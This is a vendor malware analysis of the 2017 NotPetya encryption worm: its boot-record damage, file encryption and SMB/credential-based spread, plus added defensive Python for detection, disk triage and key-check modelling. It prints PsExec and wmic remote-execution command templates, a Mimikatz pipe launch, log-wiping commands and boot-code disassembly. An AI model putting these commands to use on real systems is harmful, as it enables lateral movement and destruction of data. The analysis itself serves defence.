Trojan.Encoder.12544

Added to the Dr.Web virus database: 2017-06-27

Virus description added:

SHA1:

  • 34f917aaba5684fbe56d3c57d48ef2a1aa7cf06d

Encryption worm referred to in the mass media as Petya, Petya.A, ExPetya, WannaCry-2, etc. The mass spread of Trojan.Encoder.12544 started before noon on June 27, 2017. It is an unpacked dynamic-link library.

Overall action sequence:

  1. It adjusts its own privileges, checks the running processes and loads its binary file into memory.
  2. It allocates memory, creates a copy of itself there and calls the procedure at RVA 0x94A5. This procedure unloads the original file using FreeLibrary, overwrites the Trojan file on disk with garbage data and deletes it. After that it transfers control to the export perfc_1 of the image loaded by the Trojan.
  3. It parses its command line parameters.
  4. It performs relaunch control.
  5. It damages the boot record of the partition (VBR).
  6. It creates a scheduled task to restart the computer.

Once launched, the Trojan checks the system for running processes cSvcHst.exe (Symantec Service Framework), NS.exe (Symantec) and avp.exe (Kaspersky Anti-Virus).

It accepts several command line parameters. The first of them is a number; perhaps it is used to obtain random numbers. It also uses the parameter -h (see below).

Relaunch control

Relaunch control is performed only when the Trojan holds the SeDebugPrivilege privilege. The encoder performs relaunch control using a file it saves to the folder C:\Windows\. The file is named after the Trojan's own file name without the extension. Because the examined Trojan sample is named perfc.dat, the file that prevents its relaunch is C:\Windows\perfc. If the Trojan's file name is changed, the presence of the file C:\Windows\perfc will not prevent infection.

Wiping of a boot record

When the SeDebugPrivilege privilege is available, the Trojan wipes the VBR of disk C: by filling the first sector (counting from zero) with garbage data. Then it tries to encrypt the MBR. If the MBR describes a GPT or RAW partition, the Trojan does not encrypt it. The encryption is a XOR with the single byte 0x07. The encrypted MBR is saved to disk sector 0x22. Sectors up to 0x22 are also overwritten. If the encryption of the MBR fails, the Trojan fills the first 10 sectors with garbage data.

The malicious program can clear the system event logs using wevtutil and delete the NTFS "change journal" using fsutil.

File encryption

File encryption is performed only on logical partitions of fixed disks. The contents of each disk are encrypted in a separate thread using AES-128-CBC. Each disk gets its own key; this key is encrypted with RSA-2048 and saved in the root folder of the encrypted disk in a file named README.TXT. Encrypted files do not get an additional extension.

Resources

The Trojan contains 4 compressed resources:

  1. MZPE x86 file, SHA1 56c03d8e43f50568741704aee482704a4f5005ad, detected as Tool.Mimikatz.64.
  2. MZPE x64 file, SHA1 38e2855e11e353cedf9a8a4f2f2747f1c5c07fcf, detected as Tool.Mimikatz.65.
  3. MZPE x86 file, SHA1 cd23b7c9e0edef184930bc8e0ca2264f0608bcb3, Sysinternals PsExec.
  4. Encrypted code fragment, SHA1 5fb0843a2bbb58a92037f836a97f2f05fae71667, detected as Trojan.Inject2.55021.

The Trojan saves Sysinternals PsExec to the folder %WINDIR% or %COMMON_APPDATA% under the name dllhost.dat. Each resource is stored with a leading DWORD that holds its size in the uncompressed state.

Distribution

Once launched, the Trojan starts searching for computers in the local network using the following methods:

  1. It lists network adapters using GetAdaptersInfo and extracts their IP addresses and subnet masks, as well as the IP address of the DHCP server.
  2. If the Trojan is launched on a server, it lists DHCP scopes using DhcpEnumSubnets.
  3. It extracts all active TCP connections using GetExtendedTcpTable.
  4. It extracts the IP addresses from the ARP table using GetIpNetTable.
  5. It tries to list the machines in the domain.

Ports 445 and 139 are then scanned on the obtained list of IP addresses. Once machines with open ports are found, Trojan.Encoder.12544 attempts to infect them via the widely known SMB protocol vulnerability CVE-2017-0144.

Depending on the bitness of the operating system, the Trojan unpacks the respective version of the Mimikatz tool, saves it to a temporary folder and runs it with a named pipe:

'%TEMP%\4214.tmp' \\.\pipe\{7AC40626-8E78-436F-8DFE-8EE9752FE743}

The Trojan receives Windows user account credentials through this pipe. Besides using the Mimikatz tool, the Trojan obtains user account data in the following ways:

  1. Enumeration via CredEnumerateW with the filter TERMSRV.
  2. Parsing of the command line parameter -h, which receives a list of accounts.

Then the Trojan searches for network shares that are accessible for logon, tries to log into them using the obtained credentials and creates a copy of itself there:

\\\\%ws\\admin$\\%ws

The infection of remote machines is performed by one of the following two methods:

  1. Launch of a remote process with the Sysinternals PsExec tool, which is extracted from the Trojan's own resources:
    %s \\\\%s -accepteula -s -d C:\\Windows\\System32\\rundll32.exe \"C:\\Windows\\%s\",#1

  2. Use of the wbem\\wmic.exe tool:
    %s /node:\"%ws\" /user:\"%ws\" /password:\"%ws\" process call create \"C:\\Windows\\System32\\rundll32.exe \\\"C:\\Windows\\%s\\\" #1
    
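For defenders, here is an added example that is not part of the Dr.Web description: Python detection logic run over constructed endpoint telemetry. It flags the three behaviours described above: one host opening connections to many others on ports 445/139 within a short window, rundll32.exe loading a DLL from C:\Windows by ordinal #1 through a PsExec-style (-accepteula -s -d) or wmic "process call create" command line, and the wevtutil/fsutil log-wiping commands mentioned earlier. The event format, hostnames, thresholds and the sample command lines (which reuse the shapes quoted above with a placeholder password) are assumptions made for the example.

```python
import re
from collections import defaultdict

SMB_PORTS = {445, 139}
SCAN_THRESHOLD = 5   # distinct targets on SMB ports from one host within the window (assumed tuning)
SCAN_WINDOW = 60     # seconds (assumed tuning)

# rundll32.exe "C:\Windows\<dll>",#1  or  rundll32.exe \"C:\Windows\<dll>\" #1 (both forms quoted in the description)
RUNDLL32_ORDINAL = re.compile(r'rundll32\.exe\s+\\?"?C:\\Windows\\[^"\\,\s]+\\?"?\s*,?\s*#1', re.IGNORECASE)
# PsExec-style switches or wmic remote process creation wrapping that rundll32 call
REMOTE_LAUNCH = re.compile(r'(-accepteula\s+-s\s+-d|process\s+call\s+create)', re.IGNORECASE)
# event-log clearing and USN change-journal deletion
LOG_WIPE = re.compile(r'(wevtutil(\.exe)?\s+cl\b|fsutil(\.exe)?\s+usn\s+deletejournal)', re.IGNORECASE)

# Constructed sample telemetry (Sysmon-like: "net" = outbound connection, "proc" = process creation).
EVENTS = [
    {"ts": 0, "type": "net", "host": "WS01", "dst": "10.0.0.11", "dport": 445},
    {"ts": 1, "type": "net", "host": "WS01", "dst": "10.0.0.12", "dport": 139},
    {"ts": 2, "type": "net", "host": "WS01", "dst": "10.0.0.13", "dport": 445},
    {"ts": 3, "type": "net", "host": "WS01", "dst": "10.0.0.14", "dport": 445},
    {"ts": 4, "type": "net", "host": "WS01", "dst": "10.0.0.15", "dport": 139},
    {"ts": 5, "type": "net", "host": "WS01", "dst": "10.0.0.16", "dport": 445},
    {"ts": 9, "type": "net", "host": "FS01", "dst": "10.0.0.50", "dport": 445},      # ordinary file-server traffic
    {"ts": 9, "type": "net", "host": "FS02", "dst": "10.0.0.61", "dport": 445},      # 4 targets: below threshold
    {"ts": 10, "type": "net", "host": "FS02", "dst": "10.0.0.62", "dport": 445},
    {"ts": 11, "type": "net", "host": "FS02", "dst": "10.0.0.63", "dport": 445},
    {"ts": 12, "type": "net", "host": "FS02", "dst": "10.0.0.64", "dport": 445},
    {"ts": 20, "type": "proc", "host": "WS01", "cmdline":
        r'wmic /node:"10.0.0.12" /user:"CORP\svc" /password:"<redacted>" process call create '
        r'"C:\Windows\System32\rundll32.exe \"C:\Windows\perfc.dat\" #1"'},
    {"ts": 21, "type": "proc", "host": "WS01", "cmdline":
        r'C:\Windows\dllhost.dat \\10.0.0.13 -accepteula -s -d C:\Windows\System32\rundll32.exe "C:\Windows\perfc.dat",#1'},
    {"ts": 22, "type": "proc", "host": "WS02", "cmdline": r'C:\Windows\System32\rundll32.exe "C:\Windows\perfc.dat",#1'},
    {"ts": 30, "type": "proc", "host": "WS02", "cmdline": r'wevtutil cl Setup'},
    {"ts": 31, "type": "proc", "host": "WS02", "cmdline": r'fsutil usn deletejournal /D C:'},
    {"ts": 40, "type": "proc", "host": "FS01", "cmdline": r'C:\Windows\System32\rundll32.exe shell32.dll,Control_RunDLL'},
]


def detect_smb_sweep(events):
    """Flag a host that touches SCAN_THRESHOLD or more distinct targets on 445/139 within SCAN_WINDOW seconds."""
    findings = []
    per_host = defaultdict(list)
    for e in events:
        if e["type"] == "net" and e["dport"] in SMB_PORTS:
            per_host[e["host"]].append((e["ts"], e["dst"]))
    for host, conns in per_host.items():
        conns.sort()
        for i, (t0, _) in enumerate(conns):
            targets = {dst for t, dst in conns[i:] if t - t0 <= SCAN_WINDOW}
            if len(targets) >= SCAN_THRESHOLD:
                findings.append(("smb_sweep", host, f"{len(targets)} hosts on 445/139 within {SCAN_WINDOW}s"))
                break  # one finding per host is enough for triage
    return findings


def detect_process_events(events):
    """Flag the remote rundll32-by-ordinal launch, its local child, and the log-wiping utilities."""
    findings = []
    for e in events:
        if e["type"] != "proc":
            continue
        cmd = e["cmdline"]
        if RUNDLL32_ORDINAL.search(cmd):
            rule = "remote_rundll32_ordinal1" if REMOTE_LAUNCH.search(cmd) else "rundll32_ordinal1"
            findings.append((rule, e["host"], cmd))
        if LOG_WIPE.search(cmd):
            findings.append(("log_wipe", e["host"], cmd))
    return findings


def detect(events):
    """Return all findings as (rule, host, detail) tuples."""
    return detect_smb_sweep(events) + detect_process_events(events)


if __name__ == "__main__":
    for rule, host, detail in detect(EVENTS):
        print(f"{rule:26} {host:6} {detail}")
```

The sweep rule is deliberately coarse: a file server legitimately talks to many clients, so in production it would be scoped to workstation subnets or combined with the process-creation rules, which carry much less noise because the rundll32-by-ordinal pattern and the wevtutil/fsutil pair are rare in normal administration.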

Analysis of the boot record infection

The boot record is infected in the following order:

  1. Starting from sector 0, it writes its own MBR and the Trojan code.
  2. The original MBR, encrypted with the XOR algorithm, is saved to sector 34.
  3. A buffer filled with 0x07 is saved to sector 33.
  4. The structure used for encryption is saved to sector 32:

#pragma pack(push, 2)
struct data_info_t
{
  char isEncode;            // set to 1 once the disk has been encrypted
  char key1_salsa20[32];    // randomly generated Salsa20 key
  char key2_nonce[8];       // Salsa20 nonce
  char bitcountAddr1[64];   // 1Mz7153HMuxXTuR2R1t78mGSdzaAtNbBWX (old Petya had URLs here)
  char bitcountAddr2[64];   // empty
  char keyString[342];      // randomly generated "key" the victim is asked to send to the authors,
                            // mapped onto the alphabet 123456789ABCDEFGHJKLMNPQRSTUVWXYZabcdefghijkmnopqrstuvwxyz
  char field_0;             // pads the structure to 512 bytes, i.e. one sector
};
#pragma pack(pop)

The fields key1_salsa20, key2_nonce and keyString are randomly generated. key1_salsa20 is used to encrypt disk sectors. keyString is what the victim sends to the Trojan's authors, but since it is not connected to key1_salsa20 in any way, the criminals cannot provide a victim with a decryption key.
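As an added example that is not part of the Dr.Web description, the following Python reads sectors 32 to 34 of a disk image, unpacks data_info_t exactly as laid out above, reports whether the Salsa20 key has already been wiped, checks that sector 33 still holds the 0x07 buffer, and recovers the original MBR from sector 34 by reversing the single-byte XOR 0x07 described in the boot-record section. The disk image is constructed inline (the key, nonce and keyString values are made up; the Bitcoin address is the one from the structure comment), and the helper names are my own.

```python
import struct

SECTOR = 512
XOR_KEY = 0x07                          # single-byte XOR applied to the original MBR
DATA_INFO_FMT = "<c32s8s64s64s342sc"    # mirrors data_info_t with #pragma pack(2): 512 bytes
assert struct.calcsize(DATA_INFO_FMT) == SECTOR


def parse_data_info(sector32: bytes) -> dict:
    """Unpack the data_info_t structure stored in sector 32."""
    if len(sector32) < SECTOR:
        raise ValueError("sector 32 must be 512 bytes")
    is_encode, key1, nonce, addr1, addr2, key_string, _pad = struct.unpack(DATA_INFO_FMT, sector32[:SECTOR])
    cstr = lambda b: b.split(b"\0", 1)[0].decode("ascii", "replace")
    return {
        "isEncode": is_encode[0],
        "key1_salsa20": key1,
        "key1_zeroed": key1 == bytes(32),   # True after the first boot stage wiped the key
        "key2_nonce": nonce,
        "bitcoinAddr1": cstr(addr1),
        "keyString": cstr(key_string),
    }


def recover_mbr(sector34: bytes) -> bytes:
    """Undo the XOR 0x07 on the original MBR saved in sector 34 and require the 0x55AA signature."""
    mbr = bytes(b ^ XOR_KEY for b in sector34[:SECTOR])
    if mbr[510:512] != b"\x55\xaa":
        raise ValueError("decoded sector does not end with the 0x55AA boot signature")
    return mbr


def is_verification_sector_intact(sector33: bytes) -> bool:
    """Sector 33 holds 512 bytes of 0x07 until the boot-stage code encrypts it."""
    return sector33[:SECTOR] == bytes([XOR_KEY]) * SECTOR


def triage(image: bytes) -> dict:
    """Summarise an infected image: which stage it is in and what can be recovered."""
    sec = lambda n: image[n * SECTOR:(n + 1) * SECTOR]
    info = parse_data_info(sec(32))
    # Before the reboot isEncode is 0 and key1 is still present; after it, isEncode is 1 and key1 is zeroed.
    stage = "mft_encrypted" if info["isEncode"] == 1 or info["key1_zeroed"] else "pre_encryption"
    return {"stage": stage,
            "sector33_intact": is_verification_sector_intact(sec(33)),
            "original_mbr": recover_mbr(sec(34)),
            **info}


def build_sample_image() -> bytes:
    """Constructed 35-sector image in the state left after the infection but before the reboot."""
    key1 = bytes(range(1, 33))                         # made-up Salsa20 key
    nonce = bytes(range(8))                            # made-up nonce
    key_string = b"3jYpfR9LfWBKBzvUsUmChVBLQNEbxK8WCNDSykjHeCndRgPBBEDKAGW9bKqJ"   # made-up, alphabet-shaped
    sector32 = struct.pack(DATA_INFO_FMT, b"\x00", key1, nonce,
                           b"1Mz7153HMuxXTuR2R1t78mGSdzaAtNbBWX", bytes(64), key_string, b"\x00")
    sector33 = bytes([XOR_KEY]) * SECTOR
    original_mbr = bytearray(SECTOR)
    original_mbr[0:3] = b"\xfa\x33\xc0"                # typical boot-code prologue (cli; xor ax,ax)
    original_mbr[0x1BE] = 0x80                         # first partition entry: bootable flag
    original_mbr[0x1BE + 4] = 0x07                     # partition type NTFS
    original_mbr[510:512] = b"\x55\xaa"
    sector34 = bytes(b ^ XOR_KEY for b in original_mbr)
    return bytes(32 * SECTOR) + sector32 + sector33 + sector34   # sectors 0..31 stand in for the Trojan loader


if __name__ == "__main__":
    result = triage(build_sample_image())
    print(result["stage"], result["bitcoinAddr1"], result["original_mbr"][:3].hex())
```

The practical point for incident response: if a machine is caught before the forced reboot (isEncode still 0, key1_salsa20 still present), the original MBR and the Salsa20 key are both recoverable from sectors 32 and 34, so imaging the disk before any restart is what preserves the option of repair.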

After the computer restarts, control passes to the Trojan's boot record. The Trojan reads sector 32 and checks the flag data_info_t.isEncode==1, which marks an already encrypted disk. If the disk is not encrypted, the Trojan starts encrypting it. To do that, it reads the contents of sector 33 and encrypts them with s20_crypt; the algorithm is taken from the project https://github.com/alexwebr/salsa20. The fields data_info_t.key1_salsa20 and data_info_t.key2_nonce are used as the key and nonce. Then data_info_t.key1_salsa20 is filled with zeros, the encrypted sector 33 is saved, and sector 32 is rewritten with key1_salsa20 zeroed out.

Sector 33 serves as the indicator of a successful decryption when a user enters a key: it is decrypted in test mode and compared with a buffer filled with 0x07. After that the Trojan encrypts the MFT.
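An added example, not code from the description or from the Trojan: a Python model of the sector-33 key check described above. The cipher is a straightforward Salsa20/20 written for this example; the page names alexwebr/salsa20 as the source of s20_crypt, so the Python s20_crypt here takes the same role (key, nonce, starting byte offset, buffer) and is assumed, not verified, to be keystream-compatible with that C code. simulate_first_boot stands in for the first stage of encodeProcess (encrypt the 0x07 buffer, then zero key1); is_valid_key repeats the test-mode decryption performed when a key is entered. Key and nonce values are made up.

```python
import struct

MASK32 = 0xFFFFFFFF
SECTOR = 512
SIGMA = b"expand 32-byte k"    # Salsa20 constant for 256-bit keys
SEVEN = bytes([0x07]) * SECTOR  # contents of sector 33 before encryption


def _rotl(x, n):
    return ((x << n) | (x >> (32 - n))) & MASK32


def _quarter_round(a, b, c, d):
    b ^= _rotl((a + d) & MASK32, 7)
    c ^= _rotl((b + a) & MASK32, 9)
    d ^= _rotl((c + b) & MASK32, 13)
    a ^= _rotl((d + c) & MASK32, 18)
    return a, b, c, d


def salsa20_block(key: bytes, nonce: bytes, counter: int) -> bytes:
    """One 64-byte Salsa20/20 keystream block for a 32-byte key and 8-byte nonce."""
    k = struct.unpack("<8I", key)
    n = struct.unpack("<2I", nonce)
    c = struct.unpack("<4I", SIGMA)
    init = [c[0], k[0], k[1], k[2], k[3], c[1], n[0], n[1],
            counter & MASK32, (counter >> 32) & MASK32, c[2], k[4], k[5], k[6], k[7], c[3]]
    s = list(init)
    for _ in range(10):   # 10 double rounds = 20 rounds
        s[0], s[4], s[8], s[12] = _quarter_round(s[0], s[4], s[8], s[12])      # column rounds
        s[5], s[9], s[13], s[1] = _quarter_round(s[5], s[9], s[13], s[1])
        s[10], s[14], s[2], s[6] = _quarter_round(s[10], s[14], s[2], s[6])
        s[15], s[3], s[7], s[11] = _quarter_round(s[15], s[3], s[7], s[11])
        s[0], s[1], s[2], s[3] = _quarter_round(s[0], s[1], s[2], s[3])        # row rounds
        s[5], s[6], s[7], s[4] = _quarter_round(s[5], s[6], s[7], s[4])
        s[10], s[11], s[8], s[9] = _quarter_round(s[10], s[11], s[8], s[9])
        s[15], s[12], s[13], s[14] = _quarter_round(s[15], s[12], s[13], s[14])
    return struct.pack("<16I", *[(s[i] + init[i]) & MASK32 for i in range(16)])


def s20_crypt(key: bytes, nonce: bytes, si: int, buf: bytes) -> bytes:
    """XOR buf with the keystream starting at byte offset si; encryption and decryption are the same call."""
    out = bytearray(buf)
    block = b""
    for i in range(len(out)):
        pos = si + i
        if i == 0 or pos % 64 == 0:
            block = salsa20_block(key, nonce, pos // 64)
        out[i] ^= block[pos % 64]
    return bytes(out)


def simulate_first_boot(key1: bytes, nonce: bytes):
    """Stand-in for the first stage of encodeProcess: sector 33 is encrypted and key1 is wiped from sector 32."""
    encrypted_sector33 = s20_crypt(key1, nonce, 0, SEVEN)
    wiped_key1 = bytes(32)
    return encrypted_sector33, wiped_key1


def is_valid_key(candidate_key: bytes, nonce: bytes, encrypted_sector33: bytes) -> bool:
    """The check done when a user enters a key: decrypt sector 33 in test mode and compare with 0x07 bytes."""
    return s20_crypt(candidate_key, nonce, 0, encrypted_sector33[:SECTOR]) == SEVEN


if __name__ == "__main__":
    key, nonce = bytes(range(32)), bytes(range(8))   # made-up values
    enc, wiped = simulate_first_boot(key, nonce)
    print("key still on disk:", wiped != bytes(32))
    print("right key accepted:", is_valid_key(key, nonce, enc))
    print("wrong key accepted:", is_valid_key(bytes(32), nonce, enc))
```

Because sector 33 is a known plaintext, the check is an exact 512-byte comparison and a wrong key is rejected with overwhelming probability; but the same known plaintext gives no way back to the key once it has been zeroed, which is why the description concludes that the authors cannot supply a working decryption key.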

The encryption procedure looks as follows:


seg000:811A                               encodeProcess   proc near               ; CODE XREF: sub_84E8+DDp
seg000:811A
seg000:811A                               ind             = dword ptr -1224h
seg000:811A                               key1            = byte ptr -1220h
seg000:811A                               sevenBuf        = byte ptr -1200h
seg000:811A                               dataInfo        = data_info_t ptr -200h
seg000:811A                               part            = word ptr  4
seg000:811A                               arg_6           = byte ptr  0Ah
seg000:811A
seg000:811A C8 24 12 00                                   enter   1224h, 0
seg000:811E 56                                            push    si
seg000:811F 68 BE 9A                                      push    offset aRepairingFileS ; "\r\n  Repairing file system on C: \r\n\"...
seg000:8122 E8 B9 04                                      call    printMSG
seg000:8125 5B                                            pop     bx
seg000:8126 6A 00                                         push    0               ; isWrite
seg000:8128 6A 01                                         push    1               ; countSect
seg000:812A 6A 00                                         push    0               ; int
seg000:812C 6A 20                                         push    32              ; int
seg000:812E 8D 86 00 FE                                   lea     ax, [bp+dataInfo]
seg000:8132 50                                            push    ax              ; outBuf
seg000:8133 8A 46 0A                                      mov     al, [bp+arg_6]
seg000:8136 50                                            push    ax              ; driverIndex
seg000:8137 E8 20 0B                                      call    readWriteDisk   ; data info
seg000:813A 83 C4 0C                                      add     sp, 0Ch
seg000:813D 0A C0                                         or      al, al
seg000:813F 74 06                                         jz      short loc_8147
seg000:8141 E8 DA 07                                      call    printTXT2
seg000:8144 5E                                            pop     si
seg000:8145 C9                                            leave
seg000:8146 C3                                            retn
seg000:8147                               ; ---------------------------------------------------------------------------
seg000:8147
seg000:8147                               loc_8147:                               ; CODE XREF: encodeProcess+25j
seg000:8147 C6 86 00 FE 01                                mov     [bp+dataInfo.isEncode], 1
seg000:814C 66 2B C0                                      sub     eax, eax
seg000:814F 66 89 86 DC ED                                mov     [bp+ind], eax
seg000:8154 EB 05                                         jmp     short loc_815B
seg000:8156                               ; ---------------------------------------------------------------------------
seg000:8156
seg000:8156                               loop5:                                  ; CODE XREF: encodeProcess+5Aj
seg000:8156 66 FF 86 DC ED                                inc     [bp+ind]
seg000:815B
seg000:815B                               loc_815B:                               ; CODE XREF: encodeProcess+3Aj
seg000:815B 66 83 BE DC ED 20                             cmp     [bp+ind], 32
seg000:8161 73 13                                         jnb     short loc_8176
seg000:8163 8B B6 DC ED                                   mov     si, word ptr [bp+ind]
seg000:8167 8A 82 01 FE                                   mov     al, [bp+si+dataInfo.key1_salsa20]
seg000:816B 88 82 E0 ED                                   mov     [bp+si+key1], al
seg000:816F C6 82 01 FE 00                                mov     [bp+si+dataInfo.key1_salsa20], 0
seg000:8174 EB E0                                         jmp     short loop5
seg000:8176                               ; ---------------------------------------------------------------------------
seg000:8176
seg000:8176                               loc_8176:                               ; CODE XREF: encodeProcess+47j
seg000:8176 66 2B C0                                      sub     eax, eax
seg000:8179 66 89 86 DC ED                                mov     [bp+ind], eax
seg000:817E EB 05                                         jmp     short loc_8185
seg000:8180                               ; ---------------------------------------------------------------------------
seg000:8180
seg000:8180                               loc_8180:                               ; CODE XREF: encodeProcess+8Aj
seg000:8180 66 FF 86 DC ED                                inc     [bp+ind]
seg000:8185
seg000:8185                               loc_8185:                               ; CODE XREF: encodeProcess+64j
seg000:8185 66 83 BE DC ED 20                             cmp     [bp+ind], 32
seg000:818B 73 19                                         jnb     short loc_81A6
seg000:818D 6A 01                                         push    1               ; isWrite
seg000:818F 6A 01                                         push    1               ; countSect
seg000:8191 6A 00                                         push    0               ; int
seg000:8193 6A 20                                         push    32              ; int
seg000:8195 8D 86 00 FE                                   lea     ax, [bp+dataInfo]
seg000:8199 50                                            push    ax              ; outBuf
seg000:819A 8A 46 0A                                      mov     al, [bp+arg_6]
seg000:819D 50                                            push    ax              ; driverIndex
seg000:819E E8 B9 0A                                      call    readWriteDisk   ; data info
seg000:81A1 83 C4 0C                                      add     sp, 0Ch
seg000:81A4 EB DA                                         jmp     short loc_8180
seg000:81A6                               ; ---------------------------------------------------------------------------
seg000:81A6
seg000:81A6                               loc_81A6:                               ; CODE XREF: encodeProcess+71j
seg000:81A6 6A 00                                         push    0               ; isWrite
seg000:81A8 6A 01                                         push    1               ; countSect
seg000:81AA 6A 00                                         push    0               ; int
seg000:81AC 6A 21                                         push    33              ; int
seg000:81AE 8D 86 00 EE                                   lea     ax, [bp+sevenBuf]
seg000:81B2 50                                            push    ax              ; outBuf
seg000:81B3 8A 4E 0A                                      mov     cl, [bp+arg_6]
seg000:81B6 51                                            push    cx              ; driverIndex
seg000:81B7 E8 A0 0A                                      call    readWriteDisk   ; test encode data
seg000:81BA 83 C4 0C                                      add     sp, 0Ch
seg000:81BD 6A 00                                         push    0
seg000:81BF 68 00 02                                      push    200h            ; __int32
seg000:81C2 8D 86 00 EE                                   lea     ax, [bp+sevenBuf]
seg000:81C6 50                                            push    ax              ; sizeSevenBuf
seg000:81C7 6A 00                                         push    0
seg000:81C9 6A 00                                         push    0               ; sevenBuf
seg000:81CB 8D 8E 21 FE                                   lea     cx, [bp+dataInfo.key2_nonce]
seg000:81CF 51                                            push    cx              ; keyHW8
seg000:81D0 8D 96 E0 ED                                   lea     dx, [bp+key1]
seg000:81D4 52                                            push    dx              ; bufEncodeKey32
seg000:81D5 E8 C0 15                                      call    s20_crypt       ; https://github.com/alexwebr/salsa20
seg000:81D8 83 C4 0E                                      add     sp, 0Eh
seg000:81DB 6A 01                                         push    1               ; isWrite
seg000:81DD 6A 01                                         push    1               ; countSect
seg000:81DF 6A 00                                         push    0               ; int
seg000:81E1 6A 21                                         push    33              ; int
seg000:81E3 8D 86 00 EE                                   lea     ax, [bp+sevenBuf]
seg000:81E7 50                                            push    ax              ; outBuf
seg000:81E8 8A 46 0A                                      mov     al, [bp+arg_6]
seg000:81EB 50                                            push    ax              ; driverIndex
seg000:81EC E8 6B 0A                                      call    readWriteDisk   ; save test buf
seg000:81EF 83 C4 0C                                      add     sp, 0Ch
seg000:81F2 6A 01                                         push    1               ; char
seg000:81F4 68 52 9C                                      push    offset aChkdskIsRepair ; "  CHKDSK is repairing sector"
seg000:81F7 8D 86 21 FE                                   lea     ax, [bp+dataInfo.key2_nonce]
seg000:81FB 50                                            push    ax
seg000:81FC 8D 86 E0 ED                                   lea     ax, [bp+key1]
seg000:8200 50                                            push    ax              ; key
seg000:8201 FF 76 04                                      push    [bp+part]       ; part
seg000:8204 E8 91 0A                                      call    decodeDisk
seg000:8207 83 C4 0A                                      add     sp, 0Ah
seg000:820A E8 3B 07                                      call    initMSG2
seg000:820D CD 19                                         int     19h             ; DISK BOOT
seg000:820D                                                                       ; causes reboot of disk system
seg000:820F 5E                                            pop     si
seg000:8210 C9                                            leave
seg000:8211 C3                                            retn
seg000:8211                               encodeProcess   endp

On the whole, this code is identical to the one used by the malicious program Petya (apart from the ransom text); the data_info_t structure is the same and is likewise saved to sector 32. The difference is that in Petya key1_salsa20 and keyString are generated on the basis of elliptic curves.


Curing recommendations

  1. If the operating system (OS) can be loaded (either normally or in safe mode), download Dr.Web Security Space and run a full scan of your computer and the removable media you use. More about Dr.Web Security Space.
  2. If you cannot boot the OS, change the BIOS settings to boot your system from a CD or USB drive. Download the image of the emergency system repair disk Dr.Web® LiveDisk, write it to a USB drive or burn it to a CD/DVD. After booting from this media, run a full scan and cure all the detected threats.

Use Dr.Web Anti-virus for macOS to run a full scan of your Mac.

After booting up, run a full scan of all disk partitions with Dr.Web Anti-virus for Linux.


  1. If the mobile device is operating normally, download and install Dr.Web for Android. Run a full system scan and follow recommendations to neutralize the detected threats.
  2. If the mobile device has been locked by Android.Locker ransomware (the message on the screen tells you that you have broken some law or demands a ransom; or you see some other announcement that prevents you from using the handheld normally), do the following:
    • Boot your smartphone or tablet in safe mode (depending on the operating system version and the specifications of the particular mobile device, this procedure can be performed in various ways; consult the user guide that was shipped with the device, or contact its manufacturer);
    • Once you have activated safe mode, install Dr.Web for Android onto the infected handheld and run a full scan of the system; follow the steps recommended for neutralizing the threats that have been detected;
    • Switch off your device and turn it on as normal.
